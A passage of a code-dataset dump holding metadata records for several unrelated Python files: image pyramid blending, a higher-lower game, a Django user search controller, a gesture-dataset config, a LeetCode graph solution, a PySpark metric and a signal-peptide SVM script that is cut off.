a laplacian pyramid\n :param lap_pyr: Laplacian Pyramid\n :return: Original image\n \"\"\"\n img = lap_pyr[-1]\n for i in range(len(lap_pyr) - 1, 0, -1):\n expand = expandImg(img, lap_pyr[i - 1].shape)\n img = expand + lap_pyr[i - 1]\n return img\n\n\ndef pyrBlend(img_1: np.ndarray, img_2: np.ndarray,\n mask: np.ndarray, levels: int) -> (np.ndarray, np.ndarray):\n \"\"\"\n Blends two images using PyramidBlend method\n :param img_1: Image 1\n :param img_2: Image 2\n :param mask: Blend mask\n :param levels: Pyramid depth\n :return: (Naive blend, Blended Image)\n \"\"\"\n naive = mask * img_1 + (1 - mask) * img_2\n\n lapPyr_img1 = laplaceianReduce(img_1, levels)\n lapPyr_img2 = laplaceianReduce(img_2, levels)\n gaussPyr_mask = gaussianPyr(mask, levels)\n\n mergeN = lapPyr_img1[-1] * gaussPyr_mask[-1] + (1 - gaussPyr_mask[-1]) * lapPyr_img2[-1]\n for i in range(levels - 1, 0, -1):\n expand = expandImg(mergeN, lapPyr_img1[i - 1].shape)\n mergeN = expand + lapPyr_img1[i - 1] * gaussPyr_mask[i - 1] + (1 - gaussPyr_mask[i - 1]) * lapPyr_img2[i - 1]\n\n return naive, mergeN\n", "repo_name": "renanarimon/imageProcessing", "sub_path": "Ex3/ex3_utils.py", "file_name": "ex3_utils.py", "file_ext": "py", "file_size_in_byte": 14688, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.int", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_DEFAULT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_DEFAULT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scipy.signal.convolve2d", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.linalg.eigvals", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 142, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 153, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 182, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 214, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 218, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 232, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.countNonZero", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 261, "usage_type": "attribute"}, {"api_name": "numpy.ma.median", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 269, "usage_type": "attribute"}, {"api_name": "numpy.ma.masked_where", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 274, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 290, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 300, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 300, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 319, "usage_type": "attribute"}, {"api_name": "cv2.getGaussianKernel", "line_number": 320, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 325, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 325, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 340, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 346, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 346, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 359, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 372, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 373, "usage_type": "attribute"}]} +{"seq_id": "54759167", "text": "import random\n\nimport art\nfrom game_data import data\n\n\n# import os\n\n# def cls():\n# os.system('cls' if os.name=='nt' else 'clear')\n\n# # now, to clear the screen\n\n\ndef get_person():\n return random.choice(data)\n\n\ndef setup(score):\n print(art.logo)\n if score != 0:\n print(f'You\\'re right! Current score: {score}.')\n per1 = get_person()\n print(f\"Compare A: {per1['name']}, a {per1['description']}, from {per1['country']}.\", end='')\n print(art.vs)\n per2 = get_person()\n\n while per1 == per2:\n per2 = get_person()\n print(f\"Against B: {per2['name']}, a {per2['description']}, from {per2['country']}.\")\n\n return per1['follower_count'], per2['follower_count']\n\n\ndef winner_A_OR_B(followers):\n if followers[0] > followers[1]:\n return 'A'\n else:\n return 'B'\n\n\ndef game():\n score = 0\n\n while True:\n followers_in_tuple = setup(score)\n print(followers_in_tuple)\n winner = winner_A_OR_B(followers_in_tuple)\n\n choose = input('Who has more followers?\\nType \"A\" or \"B\": ').lower()\n\n if choose == winner.lower():\n score += 1\n # cls()\n\n else:\n print(f'Sorry, thats\\'s wrong. Final score: {score}.')\n break\n\n\ngame()\n", "repo_name": "not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022", "sub_path": "Day 14 - Beginner - Higher Lower Game Project/01_PROJECT_higher_lower_game/higher_lower_game.py", "file_name": "higher_lower_game.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "game_data.data", "line_number": 16, "usage_type": "argument"}, {"api_name": "art.logo", "line_number": 20, "usage_type": "attribute"}, {"api_name": "art.vs", "line_number": 25, "usage_type": "attribute"}]} +{"seq_id": "22431352135", "text": "from api.utils import failure_response\nfrom api.utils import success_response\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom rapidfuzz import process as fuzzymatch\nfrom rest_framework import status\n\n\nclass SearchPersonController:\n def __init__(self, request, serializer):\n self._request = request\n self._data = request.data\n self._serializer = serializer\n\n def process(self):\n users = User.objects.filter(\n Q(person__has_onboarded=True) & Q(person__soft_deleted=False)\n )\n query = self._request.GET.get(\"query\")\n # Check if query was provided and isn't whitespace\n if query is not None and query.strip() != \"\":\n # Create processor to ignore query but convert User object into string choice\n def user_properties(user):\n return [user.first_name.lower(), user.last_name.lower()]\n\n def processor(user):\n return user if type(user) is str else \" \".join(user_properties(user))\n\n searched_users = fuzzymatch.extract(\n query.lower(), users, processor=processor\n )\n # Extract the users from the returned tuple list\n users = list(map(lambda searched_user: searched_user[0], searched_users))\n\n page_size = self._request.GET.get(\"page_size\")\n page_number = self._request.GET.get(\"page_number\")\n if page_size is not None and page_number is not None:\n paginator = Paginator(users, page_size)\n try:\n page = paginator.page(page_number)\n users = page.object_list\n except:\n return failure_response(\"Page not found\", status.HTTP_404_NOT_FOUND)\n return success_response(\n self._serializer(\n users, context={\"request_user\": self._request.user}, many=True\n ).data,\n status.HTTP_200_OK,\n )\n", "repo_name": "cuappdev/pear-django-backend", "sub_path": "src/person/controllers/search_person_controller.py", "file_name": "search_person_controller.py", "file_ext": "py", "file_size_in_byte": 1999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 18, "usage_type": "call"}, {"api_name": "rapidfuzz.process.extract", "line_number": 30, "usage_type": "call"}, {"api_name": "rapidfuzz.process", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 39, "usage_type": "call"}, {"api_name": "api.utils.failure_response", "line_number": 44, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 44, "usage_type": "name"}, {"api_name": "api.utils.success_response", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 49, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "39788835306", "text": "import sys\nimport os, os.path as osp\n\nfrom copy import deepcopy\nfrom easydict import EasyDict as edict\n\ntry :\n from .base import Config_Data as Base_Data\nexcept :\n from base import Config_Data as Base_Data\n\nclass Config_Data(Base_Data) :\n \"\"\"INFO: http://www-rech.telecom-lille.fr/shrec2017-hand/\"\"\"\n name = 'hgr_shrec_2017';\n\n raw_split_files = edict({\n 'train': 'train_gestures.txt',\n 'test': 'test_gestures.txt',\n });\n\n split_dir = 'split_files';\n split_types = (\n 'single', # only single finger samples\n 'multiple', # only multiple finger samples\n 'agnostic', # single or multiple, don't care\n 'specific', # separate class id for single and multiple\n );\n\n split_files = edict({\n 'train': 'train.txt',\n 'val': 'val.txt',\n 'testval': 'val.txt',\n 'testtest': 'test.txt',\n 'testtrain': 'train.txt',\n 'test': 'test.txt',\n });\n\n # mean = edict({\n # 'x': -0.1047,\n # 'y': 0.4933,\n # 'z': -1.0664,\n # 'remission': 0.2861,\n # 'depth': 11.5944,\n # });\n\n # std = edict({\n # 'x': 12.0863,\n # 'y': 8.6324,\n # 'z': 0.8396,\n # 'remission': 0.1409,\n # 'depth': 9.6167,\n # }); \n\n\n __label_to_name = {\n 0: 'grab',\n 1: 'tap',\n 2: 'expand',\n 3: 'pinch',\n 4: 'rotate_cw',\n 5: 'rotate_ccw',\n 6: 'swipe_right',\n 7: 'swipe_left',\n 8: 'swipe_up',\n 9: 'swipe_down',\n 10: 'swipe_x',\n 11: 'swipe_+',\n 12: 'swipe_v',\n 13: 'shake',\n };\n\n label_to_name = {};\n\n __label_to_type = {\n \t0: 'fine',\n \t1: 'coarse',\n \t2: 'fine',\n \t3: 'fine',\n \t4: 'fine',\n \t5: 'fine',\n \t6: 'coarse',\n \t7: 'coarse',\n \t8: 'coarse',\n \t9: 'coarse',\n \t10: 'coarse',\n \t11: 'coarse',\n \t12: 'coarse',\n \t13: 'coarse',\n }; \n\n label_to_type = {};\n\n # class frequency - number of samples per class\n class_freq = {\n 'train': {\n 0: 72,\n 1: 70,\n 2: 67,\n 3: 72,\n 4: 73,\n 5: 72,\n 6: 73,\n 7: 76,\n 8: 71,\n 9: 74,\n 10: 68,\n 11: 74,\n 12: 67,\n 13: 71,\n 14: 74,\n 15: 72,\n 16: 68,\n 17: 64,\n 18: 69,\n 19: 70,\n 20: 67,\n 21: 64,\n 22: 72,\n 23: 71,\n 24: 72,\n 25: 70,\n 26: 62,\n 27: 65,\n },\n\n 'val': {\n 0: 28,\n 1: 30,\n 2: 33,\n 3: 28,\n 4: 27,\n 5: 28,\n 6: 27,\n 7: 24,\n 8: 29,\n 9: 26,\n 10: 32,\n 11: 26,\n 12: 33,\n 13: 29,\n 14: 26,\n 15: 28,\n 16: 32,\n 17: 36,\n 18: 31,\n 19: 30,\n 20: 33,\n 21: 36,\n 22: 28,\n 23: 29,\n 24: 28,\n 25: 30,\n 26: 38,\n 27: 35,\n },\n };\n\n\n def __init__(self, root_dir) :\n \"\"\" define all the data directories and subdirectories \"\"\"\n assert osp.isdir(root_dir), f\"Root directory {root_dir} not found.\";\n self.root_dir = os.path.expanduser(root_dir);\n\n for k in self.raw_split_files :\n self.raw_split_files[k] = osp.join(self.root_dir, self.raw_split_files[k]);\n\n self.split_dir = osp.join(self.root_dir, self.split_dir);\n for k in self.split_types :\n os.makedirs(osp.join(self.split_dir, k), exist_ok=True);\n\n self._extend_label_maps_w_split_types();\n\n\n def assert_split_type(self, type_) :\n assert type_ in self.split_types, \\\n f\"Split type {type_} must be one of {self.split_types}\";\n\n\n def get_split_filepath(self, type_, mode_) :\n self.assert_mode(mode_);\n self.assert_split_type(type_);\n fpath = osp.join(self.split_dir, type_, self.split_files[mode_]);\n if not osp.isfile(fpath) :\n fpath = osp.join(self.split_dir, self.split_files[mode_]);\n assert osp.isfile(fpath), f\"Split file not found = {fpath}\";\n \n return fpath;\n\n\n def _extend_label_maps_w_split_types(self) :\n self.label_to_name['single'] = deepcopy(self.__label_to_name);\n self.label_to_type['single'] = deepcopy(self.__label_to_type);\n self.label_to_name['multiple'] = deepcopy(self.__label_to_name);\n self.label_to_type['multiple'] = deepcopy(self.__label_to_type);\n self.label_to_name['agnostic'] = deepcopy(self.__label_to_name);\n self.label_to_type['agnostic'] = deepcopy(self.__label_to_type);\n\n self.label_to_name['specific'] = {};\n self.label_to_type['specific'] = {}; \n for k in self.__label_to_name :\n self.label_to_name['specific'][2*k] = self.__label_to_name[k] + '_1'; \n self.label_to_name['specific'][2*k+1] = self.__label_to_name[k] + '_2';\n self.label_to_type['specific'][2*k] = self.__label_to_type[k]; \n self.label_to_type['specific'][2*k+1] = self.__label_to_type[k]; \n\n\n def get_n_classes(self, type_) :\n return len(self.label_to_name[type_]);\n\n\nif __name__ == \"__main__\" :\n from pprint import pprint\n cfg_data = Config_Data(\"/data/datasets/agr/shrec2017\");\n\n for stype in cfg_data.split_types :\n print(f'{stype} names =>'); pprint(cfg_data.label_to_name[stype]);\n print();\n print(f'{stype} types =>'); pprint(cfg_data.label_to_type[stype]);\n print();\n \n", "repo_name": "humansensinglab/dfcil-hgr", "sub_path": "configs/datasets/hgr_shrec_2017.py", "file_name": "hgr_shrec_2017.py", "file_ext": "py", "file_size_in_byte": 5741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "base.Config_Data", "line_number": 12, "usage_type": "name"}, {"api_name": "easydict.EasyDict", "line_number": 16, "usage_type": "call"}, {"api_name": "easydict.EasyDict", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 191, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 192, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 194, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 195, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 196, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 216, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 218, "usage_type": "call"}]} +{"seq_id": "33534660567", "text": "from django.conf import settings\nfrom datawarehouse.models import DimUser\n\n\ndef app_env(request):\n \"\"\" This function adds value of APP_ENV variable to template context\n It used to define login and logout pages. If we are running in production\n enviroment, use auth_pubtkt. In dev enviroment, use local django auth system\n \"\"\"\n\n env = {\"APP_ENV\": settings.APP_ENV,\n \"LOGIN_URL\": settings.LOGIN_URL,\n \"REDIRECT_FIELD_NAME\": getattr(settings, 'REDIRECT_FIELD_NAME', 'next'),\n \"LOGOUT_URL\": settings.LOGOUT_URL}\n if hasattr(settings, \"SERVER_MAINTENANCE_MESSAGE\"):\n env[\"SERVER_MAINTENANCE_MESSAGE\"] = settings.SERVER_MAINTENANCE_MESSAGE\n return env\n\n\ndef app_dim_user(request):\n if request.user.is_anonymous():\n return {}\n else:\n return {'dim_user': DimUser.objects.get_or_create(username=request.user.username)[0]}", "repo_name": "vecnet/dw", "sub_path": "lib/context_processors.py", "file_name": "context_processors.py", "file_ext": "py", "file_size_in_byte": 894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.settings.APP_ENV", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.LOGIN_URL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.settings.LOGOUT_URL", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.settings", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.conf.settings.SERVER_MAINTENANCE_MESSAGE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "datawarehouse.models.DimUser.objects.get_or_create", "line_number": 24, "usage_type": "call"}, {"api_name": "datawarehouse.models.DimUser.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "datawarehouse.models.DimUser", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "38282701619", "text": "from typing import (\n DefaultDict,\n Dict,\n Iterator,\n List,\n NamedTuple,\n Optional,\n Set,\n Union,\n)\nfrom bisect import (\n bisect_left,\n bisect_right,\n)\nfrom itertools import (\n accumulate,\n chain,\n combinations,\n cycle,\n islice,\n permutations,\n product,\n repeat,\n takewhile,\n)\nfrom functools import (\n cached_property,\n)\nfrom collections import (\n defaultdict,\n deque,\n Counter,\n)\n\n\nclass Solution:\n def closestMeetingNode(self, edges: List[int], node1: int, node2: int) -> int:\n reachable = defaultdict(set)\n for from_node, destination_node in enumerate(edges):\n if destination_node != -1:\n reachable[from_node].add(destination_node)\n\n # noinspection PyShadowingNames\n def bfs(origin_node: int):\n visited = set()\n nodes_queue = deque([(origin_node, 0)])\n distances = Counter()\n\n while len(nodes_queue) > 0:\n node, distance = nodes_queue.popleft()\n distances[node] = distance\n\n if node not in visited:\n visited.add(node)\n destination_nodes = [\n destination_node\n for destination_node in reachable[node]\n if destination_node not in visited\n ]\n nodes_queue.extend(\n (destination_node, distance + 1)\n for destination_node in destination_nodes\n )\n\n return distances\n\n distances_1 = bfs(origin_node=node1)\n distances_2 = bfs(origin_node=node2)\n common_nodes_with_difference = [\n (max(distances_1[node], distances_2[node]), node)\n for node in distances_1.keys()\n if node in distances_2\n ]\n if len(common_nodes_with_difference) > 0:\n common_nodes_with_difference = sorted(common_nodes_with_difference)\n return common_nodes_with_difference[0][1]\n\n return -1\n\n\nif __name__ == '__main__':\n solution = Solution()\n # print(\n # solution.closestMeetingNode(\n # edges=[2, 2, 3, -1],\n # node1=0,\n # node2=1,\n # )\n # )\n # print(\n # solution.closestMeetingNode(\n # edges=[1, 2, -1],\n # node1=0,\n # node2=2,\n # )\n # )\n # print(\n # solution.closestMeetingNode(\n # edges=[4, 3, 0, 5, 3, -1],\n # node1=4,\n # node2=0,\n # )\n # )\n print(\n solution.closestMeetingNode(\n edges=[4, 4, 8, -1, 9, 8, 4, 4, 1, 1],\n node1=5,\n node2=6,\n )\n )\n", "repo_name": "thanhnguyen2187/random-problem-solving", "sub_path": "leetcode/n2359_find_closest_node_to_given_two_nodes.py", "file_name": "n2359_find_closest_node_to_given_two_nodes.py", "file_ext": "py", "file_size_in_byte": 2757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 37, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 38, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 46, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "13159831289", "text": "from lib.metrics import Metric\r\nfrom pyspark.sql.functions import col\r\n\r\n\r\nclass CountEntries(Metric):\r\n\t\"\"\"Count the number of records of the entities person, publicaiton and organization\"\"\"\r\n\r\n\tdef calc(self, dataFrames, spark):\r\n\t\treturn {\r\n\t\t\t\"persons\": dataFrames[\"persons\"].count(),\r\n\t\t\t\"affiliations\": dataFrames[\"persons\"].where(col(\"affiliations.orgID\").isNotNull()).count(),\r\n\t\t\t\"works\": dataFrames[\"works\"].count(),\r\n\t\t\t\"orgUnits\": dataFrames[\"orgUnits\"].count()\r\n\t\t}\r\n", "repo_name": "Stefan-Wolff/dqm-pipeline", "sub_path": "tasks/entry_count.py", "file_name": "entry_count.py", "file_ext": "py", "file_size_in_byte": 480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lib.metrics.Metric", "line_number": 5, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.col", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "30345133015", "text": "#detection of SPs using SVMs\n\ndef get_data(f):\n '''function that takes as input a file, reads it and return the corresponding pandas dataframe'''\n with open (f, 'r') as seq_df:\n return pd.read_csv(f, sep='\\t', header=0) #opening the tsv file containing the seqs\n\ndef get_sets_by_class(seq_df, num_fold):\n '''function that takes as input the seqs df, divides it into testing and training sets based on their cross-validation # and returns them'''\n test_set = seq_df[seq_df['Cross-validation fold'] == num_fold][['Class', 'Sequence (first 50 N-terminal residues)']]\n train_set = seq_df[seq_df['Cross-validation fold'] != num_fold][['Class', 'Sequence (first 50 N-terminal residues)']]\n return (test_set, train_set)\n\ndef get_all_combinations(parameters):\n '''function that creates all possible combination between of a list containing all possible k, C and gamma values. returns a list containing all these combos stored into tuples'''\n return [combination for combination in itertools.product(*parameters)] #list of tuples\n\ndef create_matrix_x(seqs_ls, k, aa_order):\n '''function that takes as input a list of sliced seqs and creates the corresponding 2D-20-dimensional composition vector'''\n #taking as input the list containing all seqs in train_set and slice them according to the k input value defined\n seqs_sliced = [seq[:k] for seq in seqs_ls]\n\n #creating the matrix_x \n matrix_x = []\n for seq in seqs_sliced:\n seq_comp = []\n for res in aa_order:\n seq_comp.append(seq.count(res) / len(seq))\n matrix_x.append(seq_comp)\n return matrix_x\n\ndef create_binary_vect(seq_df):\n '''function that takes as input a dataset and returns a list containing the Class values replaced by binary values, ie 1: SP, 0: NO_SP'''\n return list(seq_df['Class'].replace(to_replace = ['SP', 'NO_SP'], value = [1, 0])) #binary vector as a list of 1 and 0 values \n\ndef create_svc_model(matrix_x, vect_y, C_value, gamma_value):\n '''function that takes as input the matrix X and the vector Y, builds a SVM model on it and trains it'''\n svc = svm.SVC(C=C_value, kernel='rbf', gamma=gamma_value) #creating a SVC \n return svc.fit(matrix_x, vect_y) #returns the svc fitted \n\ndef find_opt_combination(mccs, combinations):\n '''returns the optimal combination of parameter k, C, gamma associated with the max MCC value found'''\n max_mcc = max(mccs)\n max_index = mccs.index(max_mcc) #finding the best MCC and its associated index in the list\n for comb_index in range(len(combinations)):\n if comb_index == max_index:\n return (max_mcc, max_index, combinations[max_index])\n\ndef get_classification(bench_df, true, pred):\n '''function that adds a feature in the bench df which collects, for each prot, if they are either TP, TN, FP, FN as found in the confusion matrix'''\n class_order = []\n for true_value, pred_value in zip(true, pred):\n if true_value == pred_value == 1:\n class_order.append('TP')\n elif true_value == pred_value == 0:\n class_order.append('TN')\n elif true_value == 0 and pred_value == 1:\n class_order.append('FP')\n else:\n class_order.append('FN')\n bench_df = bench_df.assign(Classification=class_order)\n bench_df.to_csv('benchmark_set_svm_class.tsv', index=False, sep='\\t')\n return ('The SVM classification TSV file of the benchmark entries has been produced.')\n\ndef get_metrics(true, pred):\n '''function that returns precision, recall, accuracy'''\n accuracy = accuracy_score(true, pred)\n f_score = f1_score(true, pred)\n mcc = matthews_corrcoef(true, pred)\n precision = precision_score(true, pred)\n recall = recall_score(true, pred)\n return accuracy, f_score, mcc, precision, recall\n\ndef get_se(values_ls, num_class):\n '''returns the standard error'''\n return np.std(values_ls) / sqrt(num_class)\n\nif __name__ == \"__main__\":\n import itertools\n import numpy as np\n import pandas as pd\n import sys\n from math import sqrt\n from sklearn import svm\n from sklearn.metrics import accuracy_score, confusion_matrix, f1_score, matthews_corrcoef, precision_score, recall_score\n from statistics import mean\n\n train_df = get_data(sys.argv[1])\n bench_df = get_data(sys.argv[2])\n\n aa_order = 'AQLSREKTNGMWDDHFYCIPV'\n num_class = 5\n parameters = [[20, 22, 24], [1, 2, 4], [0.5, 1, 'scale']]\n accuracies, f_scores, mccs, precisions, recalls, thrs = [], [], [], [], [], []\n testing_tn, testing_fp, testing_fn, testing_tp = 0, 0, 0, 0\n \n combinations = get_all_combinations(parameters) #list of tuples with all possible combinations\n for combination in combinations: #combination[0]: k, combination[1]: C, combination[2]: gamma\n fold_mccs = [] #list that store all 5 possible MCC for each fold cross number\n #print('Combination', combination, ':')\n for num_fold in range(num_class):\n test_set, train_set = get_sets_by_class(train_df, num_fold) #dividing the training dataset according to the fold-cross number\n test_set_matrix, train_set_matrix = create_matrix_x(list(test_set['Sequence (first 50 N-terminal residues)']), combination[0], aa_order), create_matrix_x(list(train_set['Sequence 